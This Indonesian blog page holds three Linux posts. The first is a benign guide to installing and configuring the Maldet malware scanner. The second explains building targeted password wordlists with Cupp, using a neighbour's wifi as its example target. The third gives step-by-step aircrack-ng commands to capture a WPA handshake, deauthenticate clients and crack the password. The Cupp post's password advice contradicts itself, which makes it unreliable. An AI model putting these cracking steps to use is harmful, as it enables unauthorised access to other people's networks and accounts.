Recent post
Showing posts with label Linux. Show all posts
Bagi Anda yang banyak bekerja dengan VPS dan juga dengan Linux, Anda pasti tidak asing lagi dengan serangan malware . Malware dapat menjadi ancaman serius bagi para pengguna linux karena dapat digunakan untuk mengambil berbagai informasi penting dalam perangkat Anda dan menggunakan informasi tersebut dalam tindakan criminal atau illegal. Hal ini tentu akan sangat merugikan orang yang mempunyai perangkat yang sudah terinfeksi malware. Oleh karena itu perlu penanganan khusus untuk mengatasi malware.
Linux menyediakan sebuah perangkat lunak bernama Linux Malware Detect (LMD) atau juga juga sering disebut Maldet. Perangkat lunak ini berguna untuk mendeteksi setiap malware yang menyerang Linux. Sebagai sebuah detektor malware dan pemindai khusus untuk Linux, Linux Malware Detect ini dirancang untuk environment shared hosting. Linux Malware Detect sendiri dirilis di bawah lisensi GNU GPLV2 dan dapat diinstal di lingkungan cPanel WHM dan Linux. Anda juga bisa menggunakannya bersamaan dengan alat deteksi lain seperti ClamAV.
Pada kesempatan kali ini kita akan membahas bagaimana cara menginstall dan megkonfigurasikan maldet di Linux Cloud Server.
Sebelum membahas bagaimana cara menginstall dan mengkonfigurasi Maldet, pertama-tama kita harus mengetahui dulu apa itu malware, jenis-jenisnya dan apa yang bisa dilakukan oleh malware.
Apa itu Malware?
Malware sendiri adalah sebuah singkatan dari malicious software. Dari kepanjangannya kita dapat mengartikan bahwa malware sebenarnya adalah sebuah software, namun bertujuan untuk merusak sistem komputer Anda. Mereka juga dirancang untuk secara diam-diam mengakses komputer, atau server Anda, dan mengkompromikan fungsi utamanya, mencuri data, melewati kontrol akses atau membahayakan komputer Anda.
Malware juga akan mencoba untuk mengambil berbagai macam informasi penting dari komputer Anda yang dapat digunakan oleh si pembuat malware untuk hack atau mengakses sistem komputer Anda. Beberapa informasi penting tersebut diantara adalah user id dan password email Anda. Dengan memperoleh informasi penting tersebut, si pembuat malware dapat memperoleh informasi tersebut dan juga dengan leluasa untuk memanipulasi data yang ada. Malware dapat menggandakan diri dengan menginfeksi berbagai macam script penting dan menyimpan beberapa file dengan nama file yang dapat mengelabui kita. Itulah kenapa malware kadang menjadi sangat susah untuk dideteksi.
Malware sering memasuki sebuah komputer melalui lampiran email atau dari situs web yang mencurigakan. Namun, malware juga dapat menginfeksi server dan mengunggah kode berbahaya atau halaman web yang mengirimkan malware ke pengunjung situs.
Dua jenis kerentanan yang paling banyak dilihat di sisi server ditemukan di instalasi default, yang biasanya disiapkan untuk membuat penerbitan situs web menjadi mudah, bukannya aman, dan dalam pengelolaan otentikasi dan sesi yang rusak. Oleh karen itu, penting untuk skema pengelolaan otentikasi dan sesi untuk melindungi kredensial kata sandi di seluruh situs dan server.
Jenis-jenis Malware
Ada beberapa jenis malware, termasuk virus komputer, virus worm, spyware, adware, scareware dan crimeware. Untuk menyebarkan Malware, pelaku dapat membuat situs web berbahaya milik mereka sendiri, memanfaatkan kerentanan dalam aplikasi yang bergantung pada situs web atau memanfaatkan kerentanan pada server web atau konfigurasinya.
Berikut adalah penjelasan lebih dalam tentang beberapa macam malware berdasarkan action yang dilakukan.
Zombie Computer
Zombie computer adalah suatu jenis malware dimana seorang hacker menggunakan komputer Anda tanpa Anda ketahui. Dari komputer Anda, mereka akan mengirimkan spam ke dalam email Anda dengan jumlah dan intensitas yang sangat tinggi. Jumlahnya bisa sampai ratusan spam per menit. Dengan jumlah spam dan intensitas yang tinggi, hal ini tentu akan membuat kinerja server menjadi terlampau berat dan akan mempengaruhi performa keseluruhan dari sistem. Biasanya email spam yang dikirimkan akan berupa email pornografi dan juga phishing.
Sebenarnya, infeksi zombie ini biasa bukan secara disengaja. Mereka tidak secara spesifik sebuah komputer untuk digunakan sebagai zombie computer. Biasanya virus ini memasuki sebuah komputer melalui link malware dan email-email yang berisi virus.
Adware
Adware adalah jenis malware yang berhubungan dengan advertising atau iklan. Malware jenis ini biasanya akan menampilkan berbagai macam iklan di komputer yang terinfeksi. Malware ini juga akan mengirimkan iklan pada komputer normal yang sedang membuka website yang terinfeksi malware. Ada banyak jenis iklan yang akan digunakan oleh malware jenis ini seperti iklan produk hingga iklan pornografi. Ada beberapa cara untuk memastikan apakah website atau perangkat Anda terkena malware jenis ini. Coba Anda perhatikan; apakah Anda sering menerima pop-up ads? Apakah homepage browser Anda berubah-ubah? Jenis malware ini juga akan menyebabkan beban server menjadi berat dan dapat mempengaruhi performa secara keseluruhan.
Spyware
Spyware adalah jenis malware yang bertujuan untuk memata-matai pengguna komputer yang terinfeksi. Malware ini dapat mengambil berbagai macam informasi penting dari komputer yang terinfeksi dan menggunakan informasi yang didapatkan untuk tindakan kejahatan seperti pencurian dan pembobolan kartu kredit. Jenis spyware ini merupakan salah satu malware yang banyak meresahkan pengguna komputer karena tingkat kerusakannya bisa beragam.
Mencegah Malware Dengan Maldet
Setelah Anda mengetahui apa itu malware, beberapa macam malware, serta dampak yang bisa diberikan, tindakan pencegahan malware menjadi salah satu hal yang sangat penting untuk dilakukan. Ada banyak hal bisa Anda lakukan untuk mencegah adanya malware pada website atau perangkat Anda. Beberapa cara yang bisa dilakukan diantaranya adalah tidak menggunakan nulled software atau dengan metode hardening.
Nah, selain itu, Anda juga bisa menggunakan Maldet atau Linux Malware Detect (LMD). Ini bisa menjadi salah satu cara paling ampuh untuk mencegah malware yang akan menginfeksi komputer Anda. Linux Malware Detect adalah sebuat sofware open source yang dikembangkan oleh R-fx Network. Maldet akan langsung bekerja pada sistem untuk mendeteksi potensi malware yang dapat membahayakan komputer Anda. Kabar gembiranya adalah Anda bisa mendownload dan menginstall secara gratis software ini di VPS Anda.
Cara Menginstall Linux Malware Detect (Maldet atau LDM)
Untuk dapat menginstal Maldet atau LDM, maka setidaknya ada dua syarat yang harus Anda penuhi. Anda harus punya server VPS dan juga akses SSH. Jika Anda sudah memiliki dua syarat tersebut Anda bisa melakukan proses penginstallan Maldet. Langkah pertama yang harus Anda lakukan adalah dengan login ke SSH dan jalani perintah berikut:
cd /usr/local/src/
Setelah itu Anda harus mendownload sofware maldet dihttp://www.rfxn.com/downloads/maldetect-current.tar.gz . Caranya adalah dengan memasukan link tersebut di perintah berikut:
Setelah itu masukan juga perintah extract:
tar -xzf maldetect-current.tar.gz
Jangan lupa untuk masuk ke directory maldet, yaitu dengan memasukan perintah berikut:
cd maldetect-*
Setelah itu masukan perintah berikut untuk memulai proses install:
sh ./install.sh
Setelah semua prose berhasil dilakukan maka akan muncul sebuah informasi yang berisi tentang versi softwarenya dan juga beberapa status dari proses yang sudah di lakukan sebelumnya. Yang perlu Anda cermati adalah beberapa kata seperti Installation completed dan juga Installed. Jika di informasi terdapat beberapa kata tersebut maka, proses penginstallan Maldet sudah berhasil dilakukan.
Konfigurasi Maldet
Setelah Anda selesai menginstal maldet, Anda juga bisa mengatur konfigurasi maldet sesuai dengan kebutuhan Anda. Konfigurasi Maldet tersimpan di dalam file /usr/local/maldetect/conf.maldet. Untuk melakukan konfigurasi maka Anda harus mengedit file tersebut dengan perintah nano. Berikut ini adalah perintahnya:
nano /usr/local/maldetect/conf.maldet
Setelah itu Anda dapat mempunyai beberapa pilihan konfigurasi:
Untuk mengkonfigurasikan peringatan email atau email alert, Anda dapat memasukan perintah:
email_alert=1
Jangan lupa untuk memasukan alamat email Anda untuk mendapatkan email alert.
Untuk memindah malware ke karantina dan juga di peringatan, Anda dapat memasukan perintah:
quarantine_hits=1
Untuk membersihkan malware, perintah yang harus Anda masukan adalah:
quarantine_clean=1
Untuk menentukan jumlah minimum user id yang bisa ditangguhkan:
quarantine_suspend_user_minuid=500
Untuk memperbaharui Maldet:
maldet -u or maldet –d
Untuk scan semua file dan memberikan Anda outputnya:
maldet -a /home/username/
Untuk memulihkan file yang ada di karantina:
maldet –restore /usr/local/maldetect/quarantine/config.php.238
Masih ada banyak pilihan yang bisa gunakan dalam konfigurasi Maldet. Konfigurasi Anda dapat disesuaikan dengan kebutuhan setiap pengguna.
Cara penggunaan Maldet
Ada beberapa hal yang bisa Anda lakukan memalui Maldet:
Scan VPS dengan Maldet
Untuk melakukan scan menggunakan Maldet, Anda harus memasukan perintah berikuti ini:
maldet -a /path/to/scan
Melihat hasil scan
Untuk melihat hasil scan dari maldet, Anda harus memasukan perintah berikut ini:
maldet -e SCAN ID
Menghapus Malware yang sudah di scan
Untuk menghapus malware yang sudah terdeteksi oleh Maldet, Anda harus memasukan perintah berikut ini:
maldet –clean SCANID
Simpulan
Itulah tadi semua yang harus Anda ketahui tetang malware dan juga cara install serta konfigurasi maldet untuk mencegah malware untuk menginfeksi perangkat Anda.
Tentu saja malware dapat menyebabkan kerugian yang cukup besar sehingga penting bagi kita untuk menjaga agar website dan perangkat kita dari berbagai ancaman malware. Selain dengan menginstal anti malware di server, Anda juga bisa mengantisipasi serangan malware dengan melakukan time machine backup pada server Anda. Ini menjamin bahwa Anda tidak akan kehilangan data-data di server Anda jika Anda suatu waktu terkena serangan malware.
Bagi Anda para pengguna Linux, Linux Malware Detect adalah salah satu software yang dijamin aman untuk menjaga server Anda dari berbagai serangan malware. Semoga panduan ini dapat membantu Anda terbebas dari serangan malware!
Cupp (Common User Password Profile), adalah sekumpulan kata acak yang di buat dari sebuah informasi yang spesifik, kumpulan kata tersebut adalah yang biasa kita sebut dengan wordlist.
Dalam prakteknya, yang menjadi pembeda dalam keberhasilan dari hacker A dengan yang B dalam meretas password adalah wordlist yang mereka pakai. Wordlist Indonesia tidak akan tembus jika di pakai di Amerika, ataupun wordlist dengan isinya kata-kata Minang belum tentu efektif jika digunakan di Papua.
BAGAIMANA CUPP BEKERJA..?
Manusia selalu membuat password nya mudah di ingat, misalnya ketika Anda punya pacar, maka password yang Anda buat adalah nama pacar, tanggal lahir pacar, atau tanggal jadian Anda.
Cupp mengerti pola seperti ini, sehingga dapat saya katakan, bahwa Cupp bisa membuat wordlist tertarget yang sangat efektif.
Membuat wordlist dengan Cupp cocok digunakan di Indonesia, dimana kesadaran untuk mengamankan data digital Kita masih tergolong rendah.
BAGAIMANA MEMBUAT WORDLIST DENGAN CUPP ?
Cupp ditulis dalam bahasa pemograman Python, jadi penggunaannya bisa digunakan di banyak platform bahkan android sekalipun asalkan Python sudah terinstall, Saya sendiri menggunakan Kali Linux, pada Linux Pyton sudah terinstall dari lahir.
Ok. langsung saja:
Jika git belum terinstall, anda bisa menginstall nya dengan perintah berikut:
Step 1: sudo apt-get install git
Step 2: Selanjutnya Download Cupp mengunakan perintah berikut:
git clone https://github.com/Mebus/cupp
Selanjut kita akan menggunakan Cupp, perintah yang diperlukan untuk melihat cara penggunaan cupp dengan amsumsi Kita sudah berada pada directory Cupp adalah:
python cupp.py
Untuk membuat wordlist tertarget menggunakan pertanyaan seputar profil korban, gunakan perintah:
python cupp.py -i
Jendelah baru akan muncul, lalu program akan meminta informasi tentang target, informasi itulah yang akan di acak sebagai password.
Sebagai contoh, kita membuat wordlist ini untuk membobol wifi tetangga, target kita bernama mustafa, dan kita juga mengetahui nama istri dan anaknya.
Output dari data tersebut adalah sugiri.txt di dalam folder Cupp, nama file dibuat secara otomatis.
Sekarang untuk membuktikan bahwa wordlist yang dibuat dapat membuat password yang sesuai, Kita buka hasil Cupp dengan text editor, caranya yaitu buka direktori cupp ... biasanyaa di folder /root/cupp/ ...
terus buka sugiri.txt atau wordlist yang sudah ente buat guys...
dan hasilnya taarraaaa banyak wordlist dengan kata" yang banyak kan guys..... sekarang silahkan praktekan atau gunakan buat mengcrack password yah guys.....
BAGAIMANA CARA TERHINDAR DARI WORDLIST
Cukup simple, ketika Anda mengetahui cara kerja suatu serangan, maka Anda juga akan mengetahui kelemahannya. Menggunakan password seperti P4nC451L4 tidak di sarankan karena polanya sudah ditebak, sebaiknya Anda menggunakan pola angka dan bukan angka, misalnya: P4nC451L4.
hai bertemu lagi dengan gw ..... disini gw akan share tutorial dengan judul
"BAGAIMANA CARA MENCRACK PASSWORD WIFI" apa itu mencrack ...? apa yah...? mencrack adalah mencari tahu password dengan cara melakukan login berkali-kali yang dijalankan oleh program untuk mendapatkan password yang sesuai dengan daftar password dalam kamus password yang kita miliki.....
Bagaimana membuat kamus password atau wordlist...?
Nah gw juga punya artikel "CARA MEMBUAT WORDLIST MENGGUNAKAN CUPP DI LINUX" loh...
jika kalian ingin membuat wordlist sendiri kunjungi artikel saya ajh gan, sob, mbak, mas, .... apa kakek.... hahaha.... JUST KID brow...
oke gass langsung ajh guys, media testing saya kali ini adalah BUGTRAQ OS linux ubuntu
untuk kalian yang menggunakan os yang sama silahkan ikuti tutorial berikut :
buka terminal kalian terus ketik kek gini guys.....
root@donn:~ # airmon-ng start wlan0
root@donn:~ # airodump-ng mon0
root@donn:~ # airodump-ng --bssid 08:86:44:77:22:76 -c 4 --write WPAcrack mon0
note**
>-08:86:44:77:22:76 (adalah bssid dari wifi target kita)
>-c 4 (adalah channel yang digunakan wifi target)
>-WPAcrack (adalah file yang akan anda tulis)
>-mon0 (adalah mode monitor wlan0 dari sobat)_(akan diberitahu saatanda mengetik #sudo airmon-ng start wlan0)
root@donn:~ # aireplay-ng --deauth 100 -a 08:86:44:7:22:76 mon0
>-100 (adalah jumlah yang dideklarasikan untuk pengecekan)
>08:86:44:77:22:76 (bssid wifi target)
>mon0 (mode monitor wlan0 sobat)
root@donn:~ # aircrack-ng /root/dekstop/ "MASUKAN ALAMAT LETAK [WPAcrack-01.cap]" -w /root/dekstop/wordlist.txt "MASUKAN ALAMAT LETAK WORDLIST"
SELESAI...
silahkan tunggu sampai proses pengecekan selesai ....
Gimana cukup mudah kan.....
jangan lupa share yah guys.....